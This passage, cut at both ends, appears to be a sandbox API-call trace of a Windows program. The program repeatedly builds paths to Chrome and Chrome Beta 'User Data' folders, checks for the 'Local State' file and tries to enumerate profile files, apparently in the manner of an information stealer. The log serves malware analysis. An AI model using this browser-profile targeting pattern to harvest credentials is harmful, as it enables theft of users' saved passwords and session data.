param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.489] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.490] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.490] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.490] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.490] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.490] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.490] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.490] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.490] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.490] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.490] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.491] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.491] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.491] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.491] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.491] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.491] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.491] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.491] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.491] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.491] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.492] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.492] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.492] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.492] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.492] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.492] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.492] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.492] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.492] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.492] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.493] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.493] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.493] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.493] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.493] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.493] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.493] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*") returned 63 [0234.493] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x440020, ftCreationTime.dwLowDateTime=0x740061, ftCreationTime.dwHighDateTime=0x5c0061, ftLastAccessTime.dwLowDateTime=0x6f004c, ftLastAccessTime.dwHighDateTime=0x610063, ftLastWriteTime.dwLowDateTime=0x20006c, ftLastWriteTime.dwHighDateTime=0x740053, nFileSizeHigh=0x740061, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.493] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19868c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0234.494] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Google\\Chrome Beta\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data" [0234.494] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data" [0234.494] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Local State" [0234.494] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\google\\chrome beta\\user data\\local state")) returned 0xffffffff [0234.494] wsprintfA (in: param_1=0x198450, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*") returned 66 [0234.494] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*", lpFindFileData=0x198308 | out: lpFindFileData=0x198308*(dwFileAttributes=0x650073, ftCreationTime.dwLowDateTime=0x200072, ftCreationTime.dwHighDateTime=0x610044, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x4c005c, ftLastWriteTime.dwLowDateTime=0x63006f, ftLastWriteTime.dwHighDateTime=0x6c0061, nFileSizeHigh=0x530020, nFileSizeLow=0x610074, dwReserved0=0x650074, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.494] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.494] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.495] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.495] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.495] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.495] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.495] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.495] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.495] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.496] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.496] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.496] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.496] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.496] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.496] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.496] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.496] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.496] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.496] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.497] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.497] wsprintfA (in: param_1=0x19844c, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*") returned 68 [0234.497] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome Beta\\User Data\\*.*", lpFindFileData=0x198304 | out: lpFindFileData=0x198304*(dwFileAttributes=0x55005c, ftCreationTime.dwLowDateTime=0x650073, ftCreationTime.dwHighDateTime=0x200072, ftLastAccessTime.dwLowDateTime=0x610044, ftLastAccessTime.dwHighDateTime=0x610074, ftLastWriteTime.dwLowDateTime=0x4c005c, ftLastWriteTime.dwHighDateTime=0x63006f, nFileSizeHigh=0x6c0061, nFileSizeLow=0x530020, dwReserved0=0x610074, dwReserved1=0x650074, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0234.497] wsprintfA (in: param_1=0x19844c, 